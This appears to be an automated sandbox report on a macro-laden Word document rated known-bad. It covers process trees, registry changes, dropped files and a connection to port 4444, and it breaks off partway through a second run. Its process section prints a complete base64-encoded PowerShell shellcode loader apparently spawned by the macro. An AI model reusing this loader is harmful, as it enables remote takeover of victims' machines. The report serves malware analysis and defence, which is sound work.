Malware Analysis Report

2024-10-16 06:29

Sample ID 240527-gqj8rabc53
Target 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603
SHA256 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603

Threat Level: Known bad

The file 587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Suspicious Office macro

Office macro that triggers on suspicious action

Drops file in Windows directory

Command and Scripting Interpreter: PowerShell

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:00

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:00

Reported

2024-05-27 06:01

Platform

win7-20240508-en

Max time kernel

47s

Max time network

58s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2784 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 2912 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 2756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2684 wrote to memory of 2584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2584 wrote to memory of 3004 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /w 1 /C "sv hYq -;sv pjO ec;sv maq ((gv hYq).value.toString()+(gv pjO).value.toString());powershell (gv maq).value.toString() ('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'+'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')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABQAE4APQAnACQAUABMAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVwBRAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA1ADcALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADMAMQAsAH0AZgBmACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AZQAwACwAfQBhAGQALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHYARwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAUABMACAALQBOAGEAbQBlACAAIgBwAHgAIgAgAC0AbgBhAG0AZQBzACAAcQB5AGIAOwAkAHYARwA9ACQAdgBHAC4AcgBlAHAAbABhAGMAZQAoACIAcQB5AGIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0ACIAKwAiAGkAIgArACIAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAVwBRACAAPQAgACQAVwBRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBTAGoAbQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFMAagBtACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABzAEYAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABXAFEALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJABzAEYAPQAkAFcAUQAuAEwAfQA7ACQAVQBQAD0AJAB2AEcAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGMAcgBtACAAPQAgADAAOwBmAG8AcgAoACQAUwBvAD0AMAA7ACQAUwBvACAALQBsAGUAKAAkAFcAUQAuAEwAZQBuAGcAdABoAC0AMQApADsAJABTAG8AKwArACkAewAkAHYARwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAUAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABTAG8AKQAsACAAJABXAFEAWwAkAFMAbwBdACwAIAAxACkAfQA7ACQAdgBHADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFUAUAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGMAcgBtACkAOwAkAG8AbQBsAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAHYARwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAbwBtAGwALAAkAFUAUAAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAFoATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUABOACkAKQA7ACQAdgBJAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEARwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABjAFYAVgAgAD0AIAAiAEMAOgBcACQAcQBHAFwASgB1AEcAUQBZAFcAXAAkAHEARwAkAHYASQBcAHYAMQAuADAAXAAkAHYASQAiADsAJABjAFYAVgAgAD0AIAAkAGMAVgBWAC4AcgBlAHAAbABhAGMAZQAoACIASgB1AEcAIgAsACAAIgBzAHkAcwAiACkAOwAkAGMAVgBWACAAPQAgACQAYwBWAFYALgByAGUAcABsAGEAYwBlACgAIgBRAFkAVwAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAbgBSACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAbgBSACcAKQB7ACQAdgBJAD0AIAAkAGMAVgBWAH0AOwAkAEEAaAA9ACIAIAAkAHYASQAgAEYAYwBMAFEAIAAkAFoATwAiADsAJABBAGgAPQAkAEEAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEYAYwBMAFEAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABBAGgA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e 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

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\peiwqxeg.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D13.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1D12.tmp"

Network

Country Destination Domain Proto
N/A 192.168.224.173:4444 tcp

Files

memory/1852-0-0x000000002F331000-0x000000002F332000-memory.dmp

memory/1852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1852-2-0x000000007168D000-0x0000000071698000-memory.dmp

memory/1852-6-0x0000000000500000-0x0000000000600000-memory.dmp

memory/1852-8-0x0000000000500000-0x0000000000600000-memory.dmp

memory/1852-7-0x0000000000500000-0x0000000000600000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 97c22dcacbd594f5601e846dda5b47e7
SHA1 da455548148439ced393769c650c58cafc837bf6
SHA256 e9af4febdadc7a470dc5c83f5bf6062d9264219ab318a87a3eee3a044abc8623
SHA512 f1edcda39413d8bc17b338c56527a4e0c91d0e4e1238a867d710ecdf5cbbfe2cb85cbfac150f03257c9506faad6ac4184b7ab16b04d67500a5bf0252d9a9db25

\??\c:\Users\Admin\AppData\Local\Temp\peiwqxeg.cmdline

MD5 7bb27c53af6b9541d02df14559aa78bd
SHA1 548fb5312227207ea73304ece74d7dd6b439ef3e
SHA256 dd70893e99fe7f289d7346f8121fc12a570200172692aafb603fa5eef54c221f
SHA512 7154a96d6c366c3175e9eb63abe861ebb6eb9dfb5993e32ad62c4f4e0b3a08afefbcca2da77f5d2cf085c106614027efbcfbffb5c78e84bc6d599e0f12fe7620

\??\c:\Users\Admin\AppData\Local\Temp\peiwqxeg.0.cs

MD5 983cad5e58b8e626d0bbb94f162c2530
SHA1 928e5a00d6770e304a4535dd46de98a2674bc6e1
SHA256 566297f4d486eba0ee60cdb68d4e0a3714c985a77a3be4ceeff5449ba11c3c1d
SHA512 1bf465fe68634c242b8493dde11a521d13aa2d95b60ccefc405dc53150d3654a1b699c6cab230d11c5e6655eaa72949040eec739b3125d7f8729bc028dffcda6

\??\c:\Users\Admin\AppData\Local\Temp\CSC1D12.tmp

MD5 d32311ee86c0341f415ad82994a4dc99
SHA1 d5fdcba4c54a8a116c818637f566d517638eb686
SHA256 67fe1007ed075d68e7f1eac6be60b8a5e5997fe86c4e349e2979293d94e32f4a
SHA512 01df066ba1c9c56bd9dc342e5a1bbac5ea83667a0102ec4d011062f548eac7466957fe9c30f43156b37678207351f62fe787461214a84f8af3c8d443ed099ce4

C:\Users\Admin\AppData\Local\Temp\RES1D13.tmp

MD5 11053f9591287b0a8bed2e69ad7b6361
SHA1 fd395575df7dc580dca572d9f5d8576ed4356db8
SHA256 bb0a344a4cc93701553e4e9004d08f38a2f8dd1082fe26a7792a34768a44fb8a
SHA512 a588a439191f64403ea4fd78e67c999b775864cd6ec8c869f8f3e5f3e4a9436c7075cb17e977c0ef66ed397e7fb20b2f87f4e111f8e4cfbd58ebcc0372a014bc

C:\Users\Admin\AppData\Local\Temp\peiwqxeg.dll

MD5 952fd1fbb06fd7204af702fd0428371c
SHA1 0adbcf4682367de3d3e9939c92a36d70c2e5379b
SHA256 e02c0daefbdd7a00bafac86f7523a36e8e56b5b9803cf53ef2b815bcbfc961b5
SHA512 6f97de612cf765b1d0fa2b512db6b3e99de8d3b029556b7e8eed64f79dad923716a90e32be7823888e302d7816685708c697f3f42c2b418b4c83520bf0e94b92

C:\Users\Admin\AppData\Local\Temp\peiwqxeg.pdb

MD5 4303bcb7d1534856f488b0c40c9cd732
SHA1 77f34194f64b2c11df7d3ab2ce53c43233b118ca
SHA256 14aa36eb2173167ffa2876dacabb738d731b2953733e4d91c714e618d1b711e6
SHA512 a7066afaddb94932c5536178c0be72ee76b01dc2fae4b49b7b1bcfa10bb5624c1da86aa4ab83f95211ecfa8b73b85b6b820fff3c2c299509843a7ff136ed135a

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 080c9edda6bd00bca2fcd2386c8176b4
SHA1 fa3576ed398e28159f64bfbd23fca4ed79349052
SHA256 1766fe15e1e9ebaeb83992b8220992f1374187d70ef8c0206a3cc0596d44facf
SHA512 afe0d41d99591c51d388751e8a727a67489b35f55956882bd4ce99d7b8e5ece98d16d5c522cabfa3f15d573f135cc0586db4ef4e56bd878dd0eaa629838ac65b

memory/1852-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1852-54-0x000000007168D000-0x0000000071698000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:00

Reported

2024-05-27 06:01

Platform

win10v2004-20240508-en

Max time kernel

50s

Max time network

59s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
